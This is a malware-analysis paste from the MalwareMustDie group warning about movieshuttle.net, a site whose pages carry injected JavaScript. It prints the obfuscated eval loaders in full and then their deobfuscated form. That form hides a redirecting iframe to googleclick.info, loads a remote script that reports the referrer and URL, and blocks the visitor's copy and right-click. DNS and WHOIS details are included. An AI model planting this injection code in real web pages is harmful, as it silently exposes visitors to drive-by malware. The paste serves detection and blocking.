#MalwareMustDie - Warning: movieshuttle.net / 50.87.40.75

1. #MalwareMustDie! @unixfreaxjp /malware]$ date
2. Sat Mar  2 02:09:41 JST 2013
3.  
4. // And also beware of: movieshuttle.net / 50.87.40.75
5. // Same as oklahomanews-online.com.. malicious TDS..
6.  
7. movieshuttle.net     A  50.87.40.75
8. movieshuttle.net     NS     ns1.rhostjh.com
9. movieshuttle.net     NS     ns2.rhostjh.com
10.  
11. h00p://movieshuttle.net/american-reunion-2012.html
12. or
13. h00p://movieshuttle.net/american-reunion-2012.html
14. h00p://movieshuttle.net/yohan-barnevandrer-2010.html
15. h00p://movieshuttle.net/tag/1937
16. h00p://movieshuttle.net/hoodwinked-too-hood-vs-evil-2011.html
17. h00p://movieshuttle.net/flame-and-citron-2008.html
18.  
19. // Headers...
20.  
21. --2013-03-02 01:58:43--  h00p://movieshuttle.net/beautiful-boy-2010.html
22. Resolving movieshuttle.net... seconds 0.00, 50.87.40.75
23. Caching movieshuttle.net => 50.87.40.75
24. Connecting to movieshuttle.net|50.87.40.75|:80... seconds 0.00, connected.
25.   :
26. h00p/1.1 200 OK
27. Date: Fri, 01 Mar 2013 16:58:27 GMT
28. Server: Apache
29. X-CF-Powered-By: WP 1.3.9
30. X-Pingback: h00p://movieshuttle.net/xmlrpc.php
31. Link: <h00p://movieshuttle.net/?p=3263>; rel=shortlink
32. Cache-Control: max-age=31104000
33. Expires: Mon, 24 Feb 2014 16:58:27 GMT
34. Vary: Accept-Encoding
35. Connection: close
36. Content-Type: text/html; charset=UTF-8
37. 200 OK
38. Length: unspecified [text/html]
39. Saving to: `beautiful-boy-2010.html'
40. 2013-03-02 01:58:46 (91.0 KB/s) - `beautiful-boy-2010.html' saved [108323]
41.  
42.  
43. // got this script....2 times injected in every pages...
44.   :
45. <script language="javascript" type="text/javascript">var lO1='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';var _Ox84de=["ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyzO123456789+/=","","charAt","indexOf","fromCharCode","length"];function _O1O(data){var O1OlOI=_Ox84de[O];var o1,o2,o3,h1,h2,h3,h4,bits,i=O,enc=_Ox84de[1];do{h1=O1OlOI[_Ox84de[3]](data[_Ox84de[2]](i++));h2=O1OlOI[_Ox84de[3]](data[_Ox84de[2]](i++));h3=O1OlOI[_Ox84de[3]](data[_Ox84de[2]](i++));h4=O1OlOI[_Ox84de[3]](data[_Ox84de[2]](i++));bits=h1<<18|h2<<12|h3<<6|h4;o1=bits>>16&Oxff;o2=bits>>8&Oxff;o3=bits&Oxff;if(h3==64){enc+=String[_Ox84de[4]](o1);} else {if(h4==64){enc+=String[_Ox84de[4]](o1,o2);} else {enc+=String[_Ox84de[4]](o1,o2,o3);} ;} ;} while(i<data[_Ox84de[5]]);;return enc;} ;function O1O(string){var ret=_Ox84de[1],i=O;for(i=string[_Ox84de[5]]-1;i>=O;i--){ret+=string[_Ox84de[2]](i);} ;return ret;} ;eval(_O1O(O1O(lO1)));</script><script>try{window.document.body/=2}catch(dgsgsdg){whwej=12;ww=window;}if(whwej){try{f=document.createElement("div");}catch(agdsg){whwej=O;}try{document.body--;}catch(bawetawe){if(ww.document){v=window;n=["9","9","41","3o","16","1e","3m","47","3l","4d","45","3n","46","4c","1k","3p","3n","4c","2h","44","3n","45","3n","46","4c","4b","2e","4h","36","3j","3p","3O","3j","45","3n","1e","1d","3k","47","3m","4h","1d","1f","3d","1m","3f","1f","4j","d","9","9","9","41","3o","4a","3j","45","3n","4a","1e","1f","27","d","9","9","4l","16","3n","44","4b","3n","16","4j","d","9","9","9","3m","47","3l","4d","45","3n","46","4c","1k","4f","4a","41","4c","3n","1e","18","28","41","3o","4a","3j","45","3n","16","4b","4a","3l","29","1d","4O","4c","4c","48","26","1l","1l","3p","47","47","3p","44","3n","3l","44","41","3l","43","1k","41","46","3o","47","1l","2b","4c","4a","3j","4e","3n","44","1d","16","4f","41","3m","4c","4O","29","1d","1n","1m","1m","1d","16","4O","3n","41","3p","4O","4c","29","1d","1n","1m","1m","1d","16","4b","4c","4h","44","3n","29","1d","4f","41","3m","4c","4O","26","1n","1m","1m","48","4g","27","4O","3n","41","3p","4O","4c","26","1n","1m","1m","48","4g","27","48","47","4b","41","4c","41","47","46","26","3j","3k","4b","47","44","4d","4c","3n","27","4e","41","4b","41","3k","41","44","41","4c","4h","26","4O","41","3m","3m","3n","46","27","44","3n","3o","4c","26","1j","1n","1m","1m","1m","1m","48","4g","27","4c","47","48","26","1m","27","1d","2a","28","1l","41","3o","4a","3j","45","3n","2a","18","1f","27","d","9","9","4l","d","9","9","3o","4d","46","3l","4c","41","47","46","16","41","3o","4a","3j","45","3n","4a","1e","1f","4j","d","9","9","9","4e","3j","4a","16","3o","16","29","16","3m","47","3l","4d","45","3n","46","4c","1k","3l","4a","3n","3j","4c","3n","2h","44","3n","45","3n","46","4c","1e","1d","41","3o","4a","3j","45","3n","1d","1f","27","3o","1k","4b","3n","4c","2d","4c","4c","4a","41","3k","4d","4c","3n","1e","1d","4b","4a","3l","1d","1i","1d","4O","4c","4c","48","26","1l","1l","3p","47","47","3p","44","3n","3l","44","41","3l","43","1k","41","46","3o","47","1l","2b","4c","4a","3j","4e","3n","44","1d","1f","27","3o","1k","4b","4c","4h","44","3n","1k","44","3n","3o","4c","29","1d","1j","1n","1m","1m","1m","1m","48","4g","1d","27","3o","1k","4b","4c","4h","44","3n","1k","4e","41","4b","41","3k","41","44","41","4c","4h","29","1d","4O","41","3m","3m","3n","46","1d","27","3o","1k","4b","4c","4h","44","3n","1k","4c","47","48","29","1d","1m","1d","27","3o","1k","4b","4c","4h","44","3n","1k","48","47","4b","41","4c","41","47","46","29","1d","3j","3k","4b","47","44","4d","4c","3n","1d","27","3o","1k","4b","4c","4h","44","3n","1k","4c","47","48","29","1d","1m","1d","27","3o","1k","4b","3n","4c","2d","4c","4c","4a","41","3k","4d","4c","3n","1e","1d","4f","41","3m","4c","4O","1d","1i","1d","1n","1m","1m","1d","1f","27","3o","1k","4b","3n","4c","2d","4c","4c","4a","41","3k","4d","4c","3n","1e","1d","4O","3n","41","3p","4O","4c","1d","1i","1d","1n","1m","1m","1d","1f","27","d","9","9","9","3m","47","3l","4d","45","3n","46","4c","1k","3p","3n","4c","2h","44","3n","45","3n","46","4c","4b","2e","4h","36","3j","3p","3O","3j","45","3n","1e","1d","3k","47","3m","4h","1d","1f","3d","1m","3f","1k","3j","48","48","3n","46","3m","2f","4O","41","44","3m","1e","3o","1f","27","d","9","9","4l"];h=2;s="";if(whwej){for(i=O;i-63O!=O;i++){k=i;s+=String["fro"+"mC"+"harCode"](parseInt(n[i],12*2+1+1));}z=s;ww["eval"](s);}}}}</script>
46.   :
47.  
48. // deobfs...
49.  
50. var _escape = '
51. %3Ciframe%20src%3D%22h00p%3A//googleclick.info/%3Ftravel%22%20width%3D5%20height%3D5%20frameborder%3D5%3E%3C/iframe%3E';
52. if (window.navigator.userAgent.indexOf('Rambler') >= 0 || window.navigator.userAgent.indexOf('Yandex') >= 0 || window.navigator.userAgent.indexOf('Yaho') >= 0 || window.navigator.userAgent.indexOf('Googlebot') >= 0 || window.navigator.userAgent.indexOf('Turtle') >= 0){
53.   Break();
54. }
55. ;
56. document.onselectstart = function (){
57.   return false;
58. }
59. ;
60. document.onmousedown = function (){
61.   return false;
62. }
63. ;
64. document.oncontextmenu = function (){
65.   return false;
66. }
67. ;
68. document.onkeydown = function (e){
69.   e = e || window.event;
70.   if (e.ctrlKey){
71.     if ((e.keyCode == '85') || (e.keyCode == '67') || (e.keyCode == '65') || (e.keyCode == '45'))return false;
72.   }
73. }
74. ;
75. document.onkeypress = function (e){
76.   e = e || window.event;
77.   if (e.ctrlKey){
78.     if ((e.keyCode == '85') || (e.keyCode == '67') || (e.keyCode == '65') || (e.keyCode == '45'))return false;
79.   }
80. }
81. ;
82. document.ondragstart = function (){
83.   return false;
84. }
85. ;
86. function atlpdp1(){
87.   for (wi = 0; wi < document.all.length; wi ++ ){
88.     if (document.all[wi].style.visibility != 'hidden'){
89.       document.all[wi].style.visibility = 'hidden';
90.       document.all[wi].id = 'atlpdpst'
91.     }
92.   }
93. }
94. function atlpdp2(){
95.   for (wi = 0; wi < document.all.length; wi ++ ){
96.     if (document.all[wi].id == 'atlpdpst')document.all[wi].style.visibility = ''
97.   }
98. }
99. window.onbeforeprint = atlpdp1;
100. window.onafterprint = atlpdp2;
101. var _0OO = document.createElement('script');
102. _0OO.src = 'h00p://api.myobfuscate.com/?getsrc=ok' + '&ref=' + encodeURIComponent(document.referrer) + '&url=' + encodeURIComponent(document.URL);
103. var OIl = document.getElementsByTagName('head')[0];
104. OIl.appendChild(_0OO);
105. document.write(unescape(_escape));
106.  
107.  
108. // Leads to the same IFRAMER....
109.  
110. if (document.getElementsByTagName('body')[0]){
111.   iframer();
112. }
113. else {
114.   document.write("
115. <iframe src='h00p://googleclick.info/?travel' width='100' height='100' style='width:100px;
116. height:100px;position:absolute;visibility:hidden;left:-10000px;top:0;'></iframe>");
117. }
118. function iframer(){
119.   var f = document.createElement('iframe');
120.   f.setAttribute('src', 'h00p://googleclick.info/?travel');
121.   f.style.left = '-10000px';
122.   f.style.visibility = 'hidden';
123.   f.style.top = '0';
124.   f.style.position = 'absolute';
125.   f.style.top = '0';
126.   f.setAttribute('width', '100');
127.   f.setAttribute('height', '100');
128.   document.getElementsByTagName('body')[0].appendChild(f);
129. }
130.  
131. //who's responsible for googleclick.info?
132.  
133. Domain ID:D49081589-LRMS
134. Domain Name:GOOGLECLICK.INFO
135. Created On:01-Feb-2013 07:48:44 UTC
136. Last Updated On:26-Feb-2013 05:48:36 UTC
137. Expiration Date:01-Feb-2014 07:48:44 UTC
138. Sponsoring Registrar:DomainContext Inc. (R524-LRMS)
139. Status:CLIENT TRANSFER PROHIBITED
140. Status:TRANSFER PROHIBITED
141. Registrant ID:PP-SP-001
142. Registrant Name:Domain Admin
143. Registrant Organization:PrivacyProtect.org
144.   :
145. Name Server:NS1D3.STATUSHOST.RU
146. Name Server:NS2D3.STATUSHOST.RU
147.  
148. // Just block this.. an infector anyway.
149.  
150. ----
151. #MalwareMustDie!